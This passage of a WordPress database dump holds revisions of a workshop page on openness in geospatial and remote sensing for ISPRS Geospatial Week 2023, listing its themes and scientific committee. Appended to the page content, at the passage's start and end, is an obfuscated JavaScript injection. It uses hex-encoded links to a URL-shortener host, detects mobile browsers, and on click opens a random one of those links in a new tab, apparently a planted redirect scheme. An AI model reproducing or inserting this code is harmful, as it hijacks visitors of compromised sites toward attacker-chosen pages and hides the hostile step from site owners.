_0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Openness in Geospatial and Remote Sensing</strong>','','inherit','closed','closed','','3497-revision-v1','','','2023-01-01 19:23:55','2023-01-01 19:23:55','',3497,'https://gsw2023.com/?p=3520',0,'revision','',0),
(3521,1,'2023-01-01 19:25:28','2023-01-01 19:25:28','<p>[vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3499\" img_size=\"600x600\" alignment=\"center\"][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5 style=\"text-align: justify;\"><strong>Openness helps improve access, use, reuse, and delivery of trustworthy information and data, foster innovation, shape new policies and enrich the delivery of services for societal needs in a more open and transparent manner. In the Geospatial and Remote Sensing domains, the concept of Openness is at the core of several initiatives, from policies and legal interventions in the field of Spatial Data Infrastructures (SDIs) such as e.g., the European INSPIRE Directive, to publicly-funded programmes like Copernicus, international partnerships such as the Group on Earth Observation (GEO), research approaches fostering open science, and community-led projects such as Pangeo, OpenStreetMap and the UN OpenGIS Initiative. The concept of Openness is based on three main elements: Accessibility (of data, software, standards and information), Inclusiveness (growing participation of diverse communities and partnerships between different actors: public sector, private sector, academia and citizens), and Reproducibility (effective sharing and reuse of resources and collaboration through open software tools, frameworks, libraries and open infrastructures).</strong></h5>\n<h5 style=\"text-align: justify;\"><strong>This workshop aims at bringing together experts in Open Source for Geospatial and Open Earth Observation Science and Applications to: i) discuss the advancements in the fields of open source software, open standards, open science, open innovation and open educational resources in the Geospatial and Remote Sensing domains; ii) explore new technology developments that enable Openness in Geospatial and Remote Sensing; iii) evaluate how Openness contributes to scientific advancements; and iv) showcase applications that build upon open principles to deliver products and information with societal benefits. We welcome all types of papers addressing the above, including research papers, review papers as well as papers presenting new technology, approaches and case studies and highlighting the originality compared to the state of the art. We especially welcome papers that – to the maximum extent possible – are reproducible, i.e. make all artefacts (input data, computational steps, methods and code) openly available so that consistent results can be achieved. When available, the code used in the research work shall be released under an open source license.</strong></h5>\n<h5 style=\"text-align: justify;\"><strong>The workshop will be part of the ISPRS Geospatial Week 2023, and is organised by the ISPRS ICWG IV/III/II Openness in Geospatial Science and Remote Sensing. It will be a one-day single-track workshop of oral presentations and poster sessions.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5><strong><u>Themes of event:</u></strong></h5>\n<ul>\n<li>Advancements in and applications of Open Source Software for Geospatial</li>\n<li>Open and FAIR Data, Workflows and Knowledge – openness across the whole research lifecycle</li>\n<li>Open Infrastructures for Geospatial and Remote Sensing research</li>\n<li>Open Earth Observation Platforms and Open Earth/Geospatial Science in the cloud</li>\n<li>Use cases and applications based on Open Standards</li>\n<li>Transparency and reproducibility of solutions based on machine learning and deep learning</li>\n<li>Open Geospatial data, including from collaborative projects such as OpenStreetMap</li>\n<li>Open Geospatial communities and education – managing communities, new initiatives for open science, methods, and tools to promote openness</li>\n<li>Open Innovation and Participatory Research</li>\n</ul>\n<p>&nbsp;</p>\n<h5><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>Codrina Maria Ilie, University of Technical Engineering of Bucharest and Terrasigna, Romania</li>\n<li>Peter Mooney, Maynooth University, Ireland</li>\n<li>Yair Grinberger, The Hebrew University of Jerusalem, Israel</li>\n<li>Claudia Vitolo, European Space Agency, Italy</li>\n<li>Stefanie Lumnitz, European Space Agency, Italy</li>\n<li>Stephan Meissl, EOX IT Services, Austria</li>\n<li>Alessandro Sarretta, National Research Council, Italy</li>\n<li>Alexander Kotsev, European Commission – Joint Research Centre (JRC), Italy</li>\n</ul>\n<p>Other members to be added</p>\n<p>&nbsp;</p>\n<h5><strong><u>Supporting ISPRS Working Groups:</u></strong></h5>\n<ul>\n<li>ICWG IV/III/V Openness in Geospatial Science and Remote Sensing</li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><strong>CHAIRS</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"65\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5><strong><u>Themes of event:</u></strong></h5>\n<ul>\n<li>Advancements in and applications of Open Source Software for Geospatial</li>\n<li>Open and FAIR Data, Workflows and Knowledge – openness across the whole research lifecycle</li>\n<li>Open Infrastructures for Geospatial and Remote Sensing research</li>\n<li>Open Earth Observation Platforms and Open Earth/Geospatial Science in the cloud</li>\n<li>Use cases and applications based on Open Standards</li>\n<li>Transparency and reproducibility of solutions based on machine learning and deep learning</li>\n<li>Open Geospatial data, including from collaborative projects such as OpenStreetMap</li>\n<li>Open Geospatial communities and education – managing communities, new initiatives for open science, methods, and tools to promote openness</li>\n<li>Open Innovation and Participatory Research</li>\n</ul>\n<p>&nbsp;</p>\n<h5><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>Codrina Maria Ilie, University of Technical Engineering of Bucharest and Terrasigna, Romania</li>\n<li>Peter Mooney, Maynooth University, Ireland</li>\n<li>Yair Grinberger, The Hebrew University of Jerusalem, Israel</li>\n<li>Claudia Vitolo, European Space Agency, Italy</li>\n<li>Stefanie Lumnitz, European Space Agency, Italy</li>\n<li>Stephan Meissl, EOX IT Services, Austria</li>\n<li>Alessandro Sarretta, National Research Council, Italy</li>\n<li>Alexander Kotsev, European Commission - Joint Research Centre (JRC), Italy</li>\n</ul>\n<p>Other members to be added</p>\n<p>&nbsp;</p>\n<h5><strong><u>Supporting ISPRS Working Groups:</u></strong></h5>\n<ul>\n<li>ICWG IV/III/V Openness in Geospatial Science and Remote Sensing</li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"sky\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_max_width=\"100px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"65\"][vc_separator color=\"sky\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const 